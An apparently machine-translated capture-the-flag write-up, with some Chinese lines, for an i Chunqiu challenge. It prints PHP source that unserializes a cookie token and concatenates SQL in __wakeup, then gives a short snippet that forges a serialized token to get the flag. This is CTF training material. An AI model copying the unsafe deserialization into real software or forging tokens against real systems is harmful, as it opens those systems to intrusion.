The topic is in the i spring and autumn ctf base camp
There are two login boxes to open the page, first determine whether it is injected
After trying various statements, I found that there seems to be no injection in the login interface
View the source code of the webpage and give an account
After logging in with the account password, jump to the member.php webpage, the webpage itself does not have any prompt content
Then capture the package to view, I have been looking for a long time here, and finally found a parameter in the header file of the returned package.
Try adding the show parameter to the request header:
Return to a piece of source code to start the audit trail:
<?php include 'common.php'; $requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE); class db { public $where; function __wakeup() { if(!empty($this->where)) { $this->select($this->where); } } function select($where) { $sql = mysql_query('select * from user where '.$where); return @mysql_fetch_array($sql); } } if(isset($requset['token'])) { $login = unserialize(gzuncompress(base64_decode($requset['token']))); $db = new db(); $row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\''); if($login['user'] === 'ichunqiu') { echo $flag; }else if($row['pass'] !== $login['pass']){ echo 'unserialize injection!!'; }else{ echo "(╯‵□′)╯︵┴─┴ "; } }else{ header('Location: index.php?error=1'); } ?>
看其中关键的逻辑语句:
$login = unserialize(gzuncompress(base64_decode($requset['token'])));
接着看到判断语句:
if($login['user'] === 'ichunqiu') { echo $flag; }
So we need to give the token a parameter in the cookie, first create an array and assign the user key in it as ichunqiu, and then perform the above series of operations
<?php $a = array('user'=>'ichunqiu'); $b = base64_encode(gzcompress(serialize($a))); echo $b ?>
Get the value of the token:
Go directly to the request package to add the value of the cookie, you can get the flag directly
